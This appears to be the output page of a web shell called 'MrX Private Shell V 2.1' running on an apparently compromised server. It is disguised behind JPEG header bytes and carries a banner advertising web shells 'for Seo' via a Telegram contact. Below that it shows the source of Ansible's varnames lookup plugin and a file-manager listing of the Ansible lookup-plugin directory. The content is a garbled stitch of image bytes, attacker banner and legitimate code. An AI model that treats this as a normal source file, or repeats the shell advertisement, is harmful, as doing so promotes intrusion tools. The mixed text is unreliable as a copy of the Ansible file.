����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
name: varnames
author: Ansible Core Team
version_added: "2.8"
short_description: Lookup matching variable names
description:
- Retrieves a list of matching Ansible variable names.
options:
_terms:
description: List of Python regex patterns to search for in variable names.
required: True
"""
EXAMPLES = """
- name: List variables that start with qz_
ansible.builtin.debug: msg="{{ lookup('ansible.builtin.varnames', '^qz_.+')}}"
vars:
qz_1: hello
qz_2: world
qa_1: "I won't show"
qz_: "I won't show either"
- name: Show all variables
ansible.builtin.debug: msg="{{ lookup('ansible.builtin.varnames', '.+')}}"
- name: Show variables with 'hosts' in their names
ansible.builtin.debug: msg="{{ lookup('ansible.builtin.varnames', 'hosts')}}"
- name: Find several related variables that end specific way
ansible.builtin.debug: msg="{{ lookup('ansible.builtin.varnames', '.+_zone$', '.+_location$') }}"
"""
RETURN = """
_value:
description:
- List of the variable names requested.
type: list
"""
import re
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_native
from ansible.module_utils.six import string_types
from ansible.plugins.lookup import LookupBase
class LookupModule(LookupBase):
def run(self, terms, variables=None, **kwargs):
if variables is None:
raise AnsibleError('No variables available to search')
self.set_options(var_options=variables, direct=kwargs)
ret = []
variable_names = list(variables.keys())
for term in terms:
if not isinstance(term, string_types):
raise AnsibleError('Invalid setting identifier, "%s" is not a string, it is a %s' % (term, type(term)))
try:
name = re.compile(term)
except Exception as e:
raise AnsibleError('Unable to use "%s" as a search parameter: %s' % (term, to_native(e)))
for varname in variable_names:
if name.search(varname):
ret.append(varname)
return ret
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| __init__.py | File | 4.6 KB | 0644 |
|
| config.py | File | 5.75 KB | 0644 |
|
| csvfile.py | File | 6.15 KB | 0644 |
|
| dict.py | File | 2.2 KB | 0644 |
|
| env.py | File | 2.67 KB | 0644 |
|
| file.py | File | 2.93 KB | 0644 |
|
| fileglob.py | File | 2.96 KB | 0644 |
|
| first_found.py | File | 8.52 KB | 0644 |
|
| indexed_items.py | File | 1.55 KB | 0644 |
|
| ini.py | File | 7.6 KB | 0644 |
|
| inventory_hostnames.py | File | 1.73 KB | 0644 |
|
| items.py | File | 1.82 KB | 0644 |
|
| lines.py | File | 2.16 KB | 0644 |
|
| list.py | File | 1.12 KB | 0644 |
|
| nested.py | File | 2.64 KB | 0644 |
|
| password.py | File | 17.67 KB | 0644 |
|
| pipe.py | File | 2.93 KB | 0644 |
|
| random_choice.py | File | 1.54 KB | 0644 |
|
| sequence.py | File | 8.96 KB | 0644 |
|
| subelements.py | File | 6.18 KB | 0644 |
|
| template.py | File | 6.83 KB | 0644 |
|
| together.py | File | 2.11 KB | 0644 |
|
| unvault.py | File | 1.93 KB | 0644 |
|
| url.py | File | 8.8 KB | 0644 |
|
| varnames.py | File | 2.31 KB | 0644 |
|
| vars.py | File | 3.4 KB | 0644 |
|